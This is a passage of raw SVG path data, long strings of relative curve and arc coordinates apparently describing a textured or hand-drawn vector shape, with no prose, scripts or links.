2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1